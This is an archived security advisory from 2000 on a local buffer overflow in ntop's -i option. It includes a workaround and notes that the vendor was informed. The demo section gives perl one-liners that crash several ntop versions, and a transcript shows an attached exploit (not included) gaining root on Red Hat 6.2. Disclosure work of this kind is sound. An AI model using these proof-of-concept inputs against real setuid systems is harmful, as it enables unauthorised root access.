[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : ntop local buffer overflow vulnerability

Title: ntop local buffer overflow vulnerability
Released by: Christophe Bailleux
Date: 24th October 2000
Printable version: Click here 
Subject : ntop local buffer overflow vulnerability

Author  : Christophe BAILLEUX (cb@grolier.fr)

Plateforms : *nix

Test version : ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2







I.      Problem



All ntop versions are vulnerabled to local buffer overflow attack in there

-i options.

Ntop must be owned by root with a setuid bit for the attacker to gain

root privileges.







II.     Demo





a) ntop 1.1





tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`

ntop v.1.1 MT [i686-pc-linux-gnu] listening on

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



Host      Act   -Rcvd-      Sent       TCP     UDP  ICMP

Segmentation fault

tshaw:/home/cb/SRCAUDIT/ntop-1.1$





b) ntop 1.2a7



tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`

Segmentation fault

tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$







c) ntop 1.3.1





tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`

Segmentation fault

tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$





d) ntop 1.3.2



tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`



24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00

07:04:32 PM build)

24/Oct/2000:12:32:16 Listening on

[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]

24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri 

24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/

24/Oct/2000:12:32:16 Initialising...

Segmentation fault

tshaw:/home/cb/ntop-1.3.2$









III.    Workaround



chmod ug-s path/to/ntop



ntop team has been informed (http://www.ntop.org).













IV.     Exploit (See Attachment)





Tested on redhat 6.2 (Zoot) where ntop is installed by default with the

bit setuid root





[cb@nux cb]$ cat /etc/redhat-release

Red Hat Linux release 6.2 (Zoot)

[cb@nux cb]$ rpm -qf /sbin/ntop

ntop-1.1-1

[cb@nux cb]$ id

uid=535(cb) gid=535(cb) groups=535(cb)

[cb@nux cb]$ ./expl



ntop v.1.1 MT [i586-pc-linux-gnu] listening on

..............................



Host        Act   -Rcvd-      Sent    TCP   UDP ICMP

bash#

bash# id

uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)

bash# exit

[cb@nux cb]$







Greetings to kalou, Bdev, cleb, dv, PullthePlug Community and all i

forget.

Thanks Teuk for leating me use his server, for do and test ntop redhat

6.2 exploit :)



Regards,





--

BAILLEUX Christophe - Network & System Security Engineer

Grolier Interactive Europe-OG/CS

Voice:+33-(0)1-5545-4789 - mailto:cb@grolier.fr






(C) 1999-2000 All rights reserved.